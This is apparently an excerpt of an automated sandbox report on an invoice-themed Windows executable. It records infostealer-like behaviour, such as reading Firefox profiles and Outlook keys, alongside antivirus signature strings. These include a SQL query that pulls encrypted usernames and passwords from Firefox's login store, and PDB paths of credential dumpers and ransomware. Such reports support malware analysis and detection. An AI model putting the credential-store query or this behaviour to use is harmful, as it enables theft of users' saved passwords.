Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(DISTINCT UserIdHash) FROM FolderGuardPaths;INSERT INTO FolderGuardPaths(UserIdHash, UserId, GUID, Path) VALUES ( ?, ?, ?, ? );SELECT ID FROM FolderGuardPaths WHERE UserIdHash = ? LIMIT 1;DELETE FROM FolderGuardPaths WHERE UserIdHash = ?;SELECT UserId, GUID, Path FROM FolderGuardPaths WHERE UserIdHash = ?N
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	Binary or memory string: select hostname, encryptedUsername, encryptedPassword from moz_logins where hostname like "moz-proxy://%s%%";
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE AttributeCounts SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT (SELECT COUNT() FROM File) + (SELECT COUNT() FROM FileInstance);
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO RollingQueuesTables(Key, Name, Capacity, TimeToLive, Mode) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO FolderGuardPaths(UserIdHash, UserId, GUID, Path) VALUES ( ?, ?, ?, ? );
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM BackupProcessInfo WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(25, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;SELECT ID, NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;INSERT INTO BmFileActions(FileInfoId, ThreatRecordId, Action) VALUES (?, ?, ?);INSERT INTO BmFileInfo(NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;SELECT Count(1) FROM BmFileInfo;SELECT ThreatRecordId, Action FROM BmFileActions WHERE FileInfoId == ?;DELETE FROM BmFileActions;DELETE FROM BmFileInfo;B
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM BmFileStartupActions;
Source: MpSigStub.exe, 00000023.00000003.6245821997.0000028BC8334000.00000004.00000001.sdmp	Binary or memory string: UPDATE AttributePersistContext SET FilePath = ?, Context = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?; INSERT INTO AttributePersistContext(Key, FilePath, Context, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?); SELECT Key FROM AttributePersistContext ORDER BY InsertTime ASC LIMIT 1; SELECT Key, FilePath, Context, InsertTime, ExpireTime FROM AttributePersistContext WHERE Key = ?; SELECT COUNT(1) FROM AttributePersistContext; DELETE FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; SELECT Key FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; DELETE FROM AttributePersistContext WHERE ExpireTime < ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM AttributePersistContext ORDER BY InsertTime ASC LIMIT 1;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Engine(EngineVersion, SigVersion) VALUES(? , ? );

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:368:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8996:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3892:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:368:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8996:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3892:304:WilStaging_02

Source: FAKTURA I PARAGONY.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: FAKTURA I PARAGONY.exe	Virustotal: Detection: 44%
Source: FAKTURA I PARAGONY.exe	ReversingLabs: Detection: 26%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe

File created: C:\Users\user\AppData\Local\Temp\~DF873EF0223084BD52.TMP

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source:	Binary string: \Release\runner.pdb source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp
Source:	Binary string: ASAM\original\delfiletype\delfiletype\obj\Release\delfiletype.pdb source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp
Source:	Binary string: oyvmhvtgei\bmjc\fee.pdb source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp
Source:	Binary string: Release\arc_2010.pdb source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp
Source:	Binary string: \fcrypt\Release\S\s_high.pdb source: MpSigStub.exe, 00000023.00000003.6286232837.0000028BD6261000.00000004.00000001.sdmp
Source:	Binary string: \natchat-master\x64\Release\natchat.pdb source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp
Source:	Binary string: c:\1\rich\look\80\24\Famous\35\72\special\22\melody.pdb source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp
Source:	Binary string: CFy92ROzKls\ro\HwtAF.pdb source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp
Source:	Binary string: -:\MySpys\chrome_cookie_view\Release\crome.pdb source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp
Source:	Binary string: cts\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp
Source:	Binary string: *.pdb.\|!\binplace.exe source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp
Source:	Binary string: .C:\SlackDismort\third\Release\SlackDismort.pdbat source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp
Source:	Binary string: C:\Proyectos\desktop_apps\Updater\UpdaterVittalia\obj\Release\UpdaterService.pdbxx source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: dciman32.pdb source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
Source:	Binary string: \BeamWinHTTP\Release\BeamWinHTTP.pdb source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp
Source:	Binary string: msmdsrv.pdb source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp
Source:	Binary string: Release\NexGenMediaPlayerApp.pdb source: MpSigStub.exe, 00000023.00000003.6276951583.0000028BD782D000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\mshta\objfre\i386\mshta.pdb source: MpSigStub.exe, 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmp
Source:	Binary string: he#@1.Pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: heerhWHW#@1wHJnERbRW.Pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: LMIGuardianSvc.pdb source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp
Source:	Binary string: \Release\gogodele.pdb source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp
Source:	Binary string: +020202020202020202020202020202020202020.pdb source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp
Source:	Binary string: \\Desktop\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: N%Tray Me !.*\\Release\\Tray Me !\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: \bin\DownloaderExe.pdb source: MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmp
Source:	Binary string: SpeedNewASK\Debug\spdfrmon.pdb source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp
Source:	Binary string: fastfat.pdbN source: MpSigStub.exe, 00000023.00000003.6335925716.0000028BD63AB000.00000004.00000001.sdmp
Source:	Binary string: \release\LSASecretsDump.pdb source: MpSigStub.exe, 00000023.00000003.6274482455.0000028BD75C0000.00000004.00000001.sdmp
Source:	Binary string: wl-cmd\Release\dll1.pdb source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp
Source:	Binary string: PD:\projects\new_Clicker\SIV\original\daemon\NewClieckerDll\Release\SIVUpdate.pdb] source: MpSigStub.exe, 00000023.00000003.6310854687.0000028BD61A4000.00000004.00000001.sdmp
Source:	Binary string: sctasks.pdbd source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp
Source:	Binary string: \i386\iSafeKrnlR3.pdb source: MpSigStub.exe, 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\find\objfre\i386\find.pdb source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp
Source:	Binary string: ZUsers\Admin\Documents\Visual Studio 2015\Projects\Cryptor2.0 Simple\Release\Cryptor2.0.pdba source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp
Source:	Binary string: \WinCbt\Release\WinCbt.pdb source: MpSigStub.exe, 00000023.00000003.6310448430.0000028BD6169000.00000004.00000001.sdmp
Source:	Binary string: @C:\Users\AverageGoose\source\repos\GooseLab\Release\GooseLab.pdb source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp
Source:	Binary string: usp10.pdb source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp
Source:	Binary string: :b.ProgramISLNetworkStart_win32.0\Release\launch_normal.pdb source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp
Source:	Binary string: g711codc.pdb3 source: MpSigStub.exe, 00000023.00000003.6335925716.0000028BD63AB000.00000004.00000001.sdmp
Source:	Binary string: reg.pdb source: MpSigStub.exe, 00000023.00000003.6295229489.0000028BD65FD000.00000004.00000001.sdmp
Source:	Binary string: Ransomware.pdbxN source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp
Source:	Binary string: -GMGameStart\bin\release_static\GMUnPacker.pdba source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp
Source:	Binary string: \SearchProtect\Bin\Release\ProtectService.pdb source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp
Source:	Binary string: \x64\release\shell.pdb source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp
Source:	Binary string: hWEHW#@HJERKJERJER^$.Pdb~ source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: mgr.pdb source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp
Source:	Binary string: \Release\ComBroadcaster.pdb source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmp
Source:	Binary string: bot.pdb source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp
Source:	Binary string: b-- b3: bs: bue b1f bss b5+(b---b51-b74-bd6-bf8-bbf-ban-bot-bne.bog.bck.bpk.bm.bup.b.s.but.be /be10b420b180bc01bd31bb91b2c1b-b2b6f2b443b683b7-4bd-4by24b994b8a4b,c4b0c4b{65bd85b-95bfa5bgg5b5j5bd96b2c6bhv6be-7b207bf27b-47b077be87b1a7b4f7b528bi38b478b-88b5-9b7f9b3n9but:bg,?bhi_btn_bio_bro_bbs_bet_b: ab86abs_ab-aab5babgbab.cabadabrdabffabciabgrab[tabstab{tabiuab.wab/wab1-bbc-bb59bb89bbjabbffbbtgbb#jbbcobbcsbbbubb26cba8cb4bcb6ecb4fcbyhcbdmcbcpcbipcb-tcb.db</dbe0db27dbpadbbbdbccdb\ddbbddb6edbmodboodb.pdbrrdb-4ebhbeb\debhgebehebtiebklebulebomebjoeb.rebirebprebosebrvebrwebmzeb source: MpSigStub.exe, 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp
Source:	Binary string: \\UniversalOrchestratorPrivEscPoc\\Release\\UniversalOrchestratorPrivEscPoc\.pdb source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
Source:	Binary string: .+:.*\\SkypeSpread.pdb source: MpSigStub.exe, 00000023.00000003.6276951583.0000028BD782D000.00000004.00000001.sdmp
Source:	Binary string: comp.pdbd source: MpSigStub.exe, 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmp
Source:	Binary string: \Dolphin.pdb source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp
Source:	Binary string: acpi.pdb source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
Source:	Binary string: c:\Documents and Settings\Administrator\My Documents\Visual Studio Projects\EASZZCDFR\Release\EASZZCDFR.pdb source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdbx source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp
Source:	Binary string: -C:\backward\inch\enumeration\Atmel\neces.pdb source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp
Source:	Binary string: Ivan\Documents\generic_exe\Release\BHO.pdb source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp
Source:	Binary string: \CCC\obj\Debug\CCC.pdb source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\ncpa\objfre\i386\ncpa.pdb source: MpSigStub.exe, 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmp
Source:	Binary string: WhjrkehLkpe;rltjhpow;elkrjjklWEKL#.pdb] source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: EC:\Projects\Docwize\cUniFunctions\obj\DocwizeClient\cUniFunctions.pdbx source: MpSigStub.exe, 00000023.00000003.6274482455.0000028BD75C0000.00000004.00000001.sdmp
Source:	Binary string: .+:\\src\\tcrypt\\Release\\s_(high\|low).pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-io-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp
Source:	Binary string: CryptoService.pdb source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp
Source:	Binary string: WanNengWB\WBUpd32.pdb source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp
Source:	Binary string: msasn1.pdb source: MpSigStub.exe, 00000023.00000003.6274482455.0000028BD75C0000.00000004.00000001.sdmp
Source:	Binary string: Asource\repos\Coronavirus1\Coronavirus1\obj\Debug\Coronavirus1.pdb] source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp
Source:	Binary string: ,\NetGuy_Explorer\Release\NetGuy_Explorer.pdb source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
Source:	Binary string: \TMain\Release\TSvr.pdb source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp
Source:	Binary string: 6\Desktop\EK\Source\Rina_AC\Rina_AC\Release\Rina_AC.pdb source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
Source:	Binary string: ,T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
Source:	Binary string: L%D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: \SearchProtect\bin\Release\HPNotify.pdb source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp
Source:	Binary string: Bou3asba\obj\Release\Danao.pdb source: MpSigStub.exe, 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmp
Source:	Binary string: c:\RPCInstall\Release\RPCInstall.pdb source: MpSigStub.exe, 00000023.00000003.6306362414.0000028BD740C000.00000004.00000001.sdmp
Source:	Binary string: Release DlpHook\Proxy.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
Source:	Binary string: $\SuperLight\release\MfcDllServer.pdba source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
Source:	Binary string: $\Season\Wife_low\531\Quart\table.pdb source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp
Source:	Binary string: \Sample\Release\CNetworking.pdb source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp
Source:	Binary string: \BypassUac\branches\Download\build\Release\service.pdb source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp
Source:	Binary string: 2Projects\VerifyAndLaunch\release\GCO Bootstrap.pdb source: MpSigStub.exe, 00000023.00000003.6321337544.0000028BD6471000.00000004.00000001.sdmp
Source:	Binary string: MC:\Users\wizzlabs\source\repos\ConsoleMap\ConsoleMap\obj\Release\Ehssassi.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
Source:	Binary string: OC:\Users\hoogle168\Desktop\2008Projects\NewCoreCtrl08\Release\NewCoreCtrl08.pdb source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp
Source:	Binary string: \CRP\Release\Mount.pdbaD source: MpSigStub.exe, 00000023.00000003.6335925716.0000028BD63AB000.00000004.00000001.sdmp
Source:	Binary string: :Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp
Source:	Binary string: 7h4qMQ1edvEOY+wQIOdVR_v.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: \Release\MyEncrypter2.pdb source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp
Source:	Binary string: c:\dev\torntv\Release\TornTVApp.pdb source: MpSigStub.exe, 00000023.00000003.6324858901.0000028BD71BA000.00000004.00000001.sdmp
Source:	Binary string: winlogon.PDB source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: K8MiniPage.pdbx source: MpSigStub.exe, 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp
Source:	Binary string: \RUNPCH\Release\GUO_CAU.pdb source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
Source:	Binary string: 0.pdb source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp
Source:	Binary string: \bundler\Production\bundler.pdb source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-shlwapi-obsolete-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp
Source:	Binary string: D:\C++\AsusShellCode\Release\AsusShellCode.pdb source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp
Source:	Binary string: R,\\fishmaster\\x64\\Release\\fishmaster\.pdb source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdbx source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp
Source:	Binary string: costura.injectordll.pdb source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp
Source:	Binary string: )\CVE-2019-0803201992\Release\poc_test.pdb source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
Source:	Binary string: cleanmgr.pdbPE source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp
Source:	Binary string: [H:\My Data\My Source Code\Microsoft Office 2010\AutoKMS\AutoKMS\obj\x86\Release\AutoKMS.pdb source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp
Source:	Binary string: mpengine.pdbOGPS source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp
Source:	Binary string: A .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp
Source:	Binary string: f:\project_2008\Fileman_candle_kgrid\Filebus\Bin\UpdateWindow.pdb source: MpSigStub.exe, 00000023.00000003.6305976502.0000028BD7388000.00000004.00000001.sdmp
Source:	Binary string: wRHWRH@4hjethwehgw.pdb source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp
Source:	Binary string: unknowndll.pdba~ source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
Source:	Binary string: \fiDarSayebni.pdb source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp
Source:	Binary string: IperiusRDPClient.pdb source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp
Source:	Binary string: %KMS Client\bin\Release\KMS Client.pdba} source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
Source:	Binary string: S\ccnet\Publish_Client\work\src\mainapp\Abacus.LaunchMail\bin\Release\LaunchMail.pdb source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\attrib\objfre\i386\attrib.pdbP& source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp
Source:	Binary string: C:\SuccWare\SuccWare\obj\Debug\SuccWare.pdb source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp
Source:	Binary string: wajam_goblin.pdb source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp
Source:	Binary string: \\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: d:\av\common_main.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\twunk_16\objchk\i386\twunk_16.pdb source: MpSigStub.exe, 00000023.00000003.6339668679.0000028BD61EC000.00000004.00000001.sdmp
Source:	Binary string: MsiDatabaseMerge.pdb source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp
Source:	Binary string: joy.pdb source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
Source:	Binary string: WebBrowserPassView.pdb source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp
Source:	Binary string: msimg32.pdb source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp
Source:	Binary string: E:\Work\SaveVid\Savevid-WS-Trunk\InstallCore\rbin\soffer.pdb source: MpSigStub.exe, 00000023.00000003.6333995743.0000028BD75DA000.00000004.00000001.sdmp
Source:	Binary string: GCWYq1g.pdb source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp
Source:	Binary string: *.pdb.\|!%WINDIR%\Microsoft.NET\mscorsvw.exe source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp
Source:	Binary string: mfcsubs.pdb source: MpSigStub.exe, 00000023.00000003.6325684988.0000028BD66A2000.00000004.00000001.sdmp
Source:	Binary string: Release\NtdsAudit.pdb source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: netsh.pdbj source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: BTR.pdbGCTL source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp
Source:	Binary string: mshta.pdb source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp
Source:	Binary string: D:\developement\projects\flood_load\Release\flood_load.pdb source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp
Source:	Binary string: PROZIPPER.pdb source: MpSigStub.exe, 00000023.00000003.6310854687.0000028BD61A4000.00000004.00000001.sdmp
Source:	Binary string: sfxrar32\Release\sfxrar.pdbxB source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
Source:	Binary string: \\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
Source:	Binary string: ddraw.pdb source: MpSigStub.exe, 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp
Source:	Binary string: GPDFDocument.pdb source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp
